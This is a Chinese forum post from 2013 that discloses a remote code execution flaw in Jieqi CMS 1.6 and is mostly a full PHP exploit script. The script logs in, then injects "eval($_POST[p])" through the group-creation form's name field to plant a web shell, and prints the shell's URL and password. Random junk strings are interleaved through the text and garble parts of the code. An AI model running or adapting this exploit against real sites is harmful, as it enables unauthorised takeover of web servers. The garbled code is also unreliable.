杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
4 f3 e' k1 [- W5 j5 Z" S6 }0 U+ b" C- {& b8 t6 ?3 I& g6 p
3 Q* F( D9 q; f2 x, G* Z% E& }2 \该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
0 L4 j* a, B/ w% h% ~6 n 需要有一个能创建圈子的用户。7 `0 i* j8 Q( `3 @) ~
* [7 Z5 }0 w3 E& h7 y
<?php
3 k* C {8 z, d# y% G& t9 C/ C+ G( S
. j" z$ R# h) p5 |6 Z% Mprint_r('
4 E, e& W: a* @+---------------------------------------------------------------------------+
?6 i. k- Y; j& bJieqi CMS V1.6 PHP Code Injection Exploit
2 z& f, w) @0 q4 O& A6 ?# jby flyh4t: ^/ a4 r. K& I, k# H
mail: phpsec at hotmail dot com4 e& L) v" K5 V5 B" \& A$ K( r6 @
team: http://www.wolvez.org5 w3 _7 j3 L0 ~; a9 E2 \
+---------------------------------------------------------------------------+
- l7 A5 w$ b% m* v: G9 c* s" r4 r; S'); /**1 B0 x. |/ Y; V0 I& c/ O
* works regardless of php.ini settings
& x& g, q! d {! ~ h5 z*/ if ($argc < 5) { print_r('
, N/ o& @9 j" c& l9 d! ]+---------------------------------------------------------------------------+
7 ^, d$ Q! e0 FUsage: php '.$argv[0].' host path username; n9 e5 v& V, G0 W% Q1 y+ I
host: target server (ip/hostname)5 M5 g; ]" P' @3 {1 O
path: path to jieqicms
% O; n6 P% ^9 X, B, p( nuasename: a username who can create group
0 [; Z" p+ G6 e# _6 u: Y8 l. D- N% fExample:# m5 C o6 P1 \% V9 s3 r J1 n3 Y
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
/ G! n' A9 L/ [! j2 u+---------------------------------------------------------------------------+! ?: J4 p) \0 ^+ |, Q" U7 M
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
, \% ?* N1 A2 PContent-Disposition: form-data; name="gname"- Q3 x6 _* z3 j. u& Z
1 u& \1 X0 B7 j, @# r
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t- y$ M% m' p: ^* Y: `
-----------------------------23281168279961/ z) G2 ?( H: z
Content-Disposition: form-data; name="gcatid"* d' n8 W N- Y2 w; I8 k
9 M, x7 R7 m( {; s1! Q& U$ c/ ], B _+ h, Y2 D
-----------------------------232811682799615 P1 `0 T2 | t# e1 b5 }
Content-Disposition: form-data; name="gaudit"
) I# ]+ \# \& T
9 I$ o7 K' h/ p; ^+ e7 J) Q7 s- n1* Z/ e2 g8 h) ^7 k( k6 @/ t3 j+ o0 S
-----------------------------23281168279961! l: h+ p) ^, ~7 [7 y. O$ i
Content-Disposition: form-data; name="gbrief"0 q: @4 N2 V. D) l5 D5 E0 f7 b2 n
$ [& r3 r, E3 s
1
3 o' Y: e1 R3 A5 N7 P# F1 o-----------------------------23281168279961--
& b. j; P1 k* h& v. Q4 u. ]'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com* s; p3 F2 q# b1 K' H f4 k+ U1 D4 m
) B+ g8 B# }1 ]6 X" z
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对